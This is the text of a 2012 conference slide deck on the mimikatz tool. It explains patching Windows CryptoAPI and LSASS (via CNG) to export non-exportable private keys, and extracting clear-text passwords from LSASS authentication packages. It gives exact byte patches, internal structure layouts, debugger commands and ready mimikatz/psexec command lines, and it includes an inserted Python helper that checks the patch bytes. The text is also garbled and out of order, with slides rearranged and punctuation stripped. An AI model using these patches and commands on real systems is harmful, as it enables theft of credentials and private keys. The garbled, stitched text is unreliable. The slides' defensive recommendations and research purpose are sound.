"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader…
- cryptdll.dll, rsaenh.dll…
Process deals with cryptographic keys through this API…
mimikatz crypto capi: how it's exported (… level)

Diagram (PLAYSKOOL): the process asks CryptoAPI / the RSA CSP to export a key → the CSP loads the private key (DPAPI decode) → exportable? yes → exported key; no → NTE_BAD_KEY_STATE
mimikatz crypto patchcapi: because I own my process

When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable

mimikatz # crypto::exportCertificates
Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Key container  : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider       : Microsoft Enhanced Cryptographic Provider v1.0
    Type           : AT_KEYEXCHANGE
    Exportability  : NO
    Key size       : 2048
    Private export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
    Public export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
mimikatz crypto patchcapi: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space

.text:0AC0B7CB  0F 85 33 C7 FF FF    jnz   continue_key_export_or_archive
becomes
.text:0AC0B7CB  90                   nop
.text:0AC0B7CC  E9 33 C7 FF FF       jmp   continue_key_export_or_archive

.text:0AC1F749  0F 85 B6 3B FF FF    jnz   continue_key_export_or_archive_prepare
becomes
.text:0AC1F749  90                   nop
.text:0AC1F74A  E9 B6 3B FF FF       jmp   continue_key_export_or_archive_prepare
mimikatz crypto patchcapi: demo time
Import, export, import as not exportable… export!
mimikatz crypto patchcapi: limitations

Because
- I'm lazy
- I've seen in the majority of cases RSA keys for real life use
  • Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto cng: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context
Process uses RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
- It is, but it's not perfect…
mimikatz crypto cng: how it's exported (… level)

Diagram (PLAYSKOOL): the process asks CNG to export a key → RPC to the KeyIso service (LSASS process; NT6: System, protected process, ML_SYSTEM with SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP) → it loads the private key (DPAPI decode) → exportable? yes → exported key; no → NTE_NOT_SUPPORTED
mimikatz crypto patchcng: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable

mimikatz # crypto::exportKeys
[user] CNG keys
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportability  : NO
    Key size       : 2048
    Private export in 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) The requested operation is not supported.
mimikatz crypto patchcng: because sometimes I own LSASS

This time, checks and keys are in LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210  75 1C    jnz   short continue_key_export
becomes
.text:6C815210  EB 1C    jmp   short continue_key_export
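The two patches above (rsaenh!CPExportKey in the mimikatz process, ncrypt!SPCryptExportKey inside LSASS), as an added example in Python, not mimikatz code. It takes the addresses and opcode bytes printed on the slides and checks that rewriting `0F 85 rel32` into `90 E9 rel32`, and `75 rel8` into `EB rel8`, keeps the branch target unchanged while making the "exportable?" test always fall through to the export path; it also counts how many bytes actually differ, which is where the "4" and the "1" come from. Label names are the slides'; the helper names are this example's own.

```python
# Added example (not mimikatz code): forcing an x86 conditional branch without
# touching its displacement. Addresses and bytes are the ones shown on the slides.

NOP, JMP_REL8, JMP_REL32 = 0x90, 0xEB, 0xE9
JNZ_REL8, JNZ_REL32 = 0x75, b"\x0F\x85"


def branch_target(va: int, insn: bytes) -> int:
    """Absolute target of a jnz/jmp at `va`: end of the instruction + sign-extended displacement."""
    if insn[:2] == JNZ_REL32:
        length, disp = 6, int.from_bytes(insn[2:6], "little", signed=True)
    elif insn[0] == JMP_REL32:
        length, disp = 5, int.from_bytes(insn[1:5], "little", signed=True)
    elif insn[0] in (JNZ_REL8, JMP_REL8):
        length, disp = 2, int.from_bytes(insn[1:2], "little", signed=True)
    else:
        raise ValueError(f"not a jnz/jmp: {insn.hex()}")
    return (va + length + disp) & 0xFFFFFFFF


def force_branch(insn: bytes) -> bytes:
    """Rewrite a jnz into an unconditional jump to the same target, changing only opcode bytes."""
    buf = bytearray(insn)
    if buf[:2] == JNZ_REL32:
        # 0F 85 d32 (6 bytes) -> 90 E9 d32: the jmp starts one byte later but is one
        # byte shorter, so "next instruction + d32" is the same address as before.
        buf[0], buf[1] = NOP, JMP_REL32
    elif buf[0] == JNZ_REL8:
        buf[0] = JMP_REL8                    # 75 d8 -> EB d8: same length, same d8
    else:
        raise ValueError(f"no jnz at start of {insn.hex()}")
    return bytes(buf)


def patch_site(va: int, insn: bytes):
    """Return (patched bytes, target before, target after, number of bytes that changed)."""
    patched = force_branch(insn)
    before = branch_target(va, insn)
    # For the rel32 form the jmp now sits behind the nop, one byte further on.
    after = branch_target(va + 1, patched[1:]) if patched[0] == NOP else branch_target(va, patched)
    changed = sum(a != b for a, b in zip(insn, patched))
    return patched, before, after, changed


def bytes_written(sites) -> int:
    """Total bytes that differ after patching every site (the '4' and the '1' of the slides)."""
    return sum(patch_site(va, insn)[3] for va, insn in sites)


# Sites quoted on the slides.
CAPI_SITES = [  # rsaenh!CPExportKey, in mimikatz's own process
    (0x0AC0B7CB, bytes.fromhex("0F8533C7FFFF")),   # jnz continue_key_export_or_archive
    (0x0AC1F749, bytes.fromhex("0F85B63BFFFF")),   # jnz continue_key_export_or_archive_prepare
]
CNG_SITES = [   # ncrypt!SPCryptExportKey, inside LSASS (keyiso)
    (0x6C815210, bytes.fromhex("751C")),           # jnz short continue_key_export
]

if __name__ == "__main__":
    for va, insn in CAPI_SITES + CNG_SITES:
        patched, before, after, changed = patch_site(va, insn)
        print(f"{va:08X}: {insn.hex().upper()} -> {patched.hex().upper()}  "
              f"target {before:08X} -> {after:08X}  ({changed} byte(s) changed)")
```

The check that matters operationally is `before == after` for every site: a patch that shifts the jump target by even one byte lands in the middle of an instruction and crashes the process, which in the CNG case is LSASS itself.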
mimikatz crypto patchcng: demo time
Import, export, import as not exportable… export again!
mimikatz crypto patchcng: limitations

Patch operation needs some privileges
- Admin (debug privilege)
- SYSTEM

mimikatz crypto::patchcng only deals with
- Microsoft Software Key Storage Provider (maybe other algs than RSA)

Not a limitation of mimikatz, but the MMC addin for certificates cannot export CNG certificates… even those that are exportable (hu?)
- certutil can…
mimikatz # crypto::patchcng
bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz # crypto
memo

Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz # crypto
what we can do?

Exactly the same as for sekurlsa: what helps is preventing access to accounts/computers
– no admin, no admin, no admin…

Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz
what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz
that's all folks!

Thanks to
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You for your attention

Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com/
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz/
email: benjamin@gentilkiwi.com
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
Who Why
Benjamin DELPY `gentilkiwi`ndash Frenchndash 26yndash Kiwi addictndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usagendash Hack with class
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 2
mimikatzworking
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3
sekurlsadll
mimikatzexe
KeyIsolaquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLoglaquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
SamSSlaquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipeWrite a welcome messageWait commandshellip and return results
mimikatzarchitecture of sekurlsa amp crypto
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo
mod_mimikatz_divers
mod_mimikatz_winmine
mod_mimikatz_impersonate
mod_mimikatz_inject
mod_mimikatz_samdump
mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle
mod_mimikatz_system
mod_mimikatz_service
mod_mimikatz_process
mod_mimikatz_thread
mod_mimikatz_terminalserver
mod_mimikatz_privilege
mod_pipe
mod_inject
mod_memory
mod_parseur
mod_patch
mod_hive
mod_secacl
mod_privilege
mod_process
mod_service
mod_system
mod_thread
mod_ts
mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0
tspkg
wdigest
livessp
kerberos
kappfreedll
kelloworlddll
klockdll
mimikatzsys
sekurlsadll
sam
secrets
msv_1_0
wdigest
livessp
kerberos
tspkg
mimikatz sekurlsawhat is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5
mod_mimikatz_sekurlsa
mimikatz sekurlsahow LSA works ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6
LsaSSWinLogon
AuthenticationPackagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
userdomainpassword
PLAYSKOOL
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
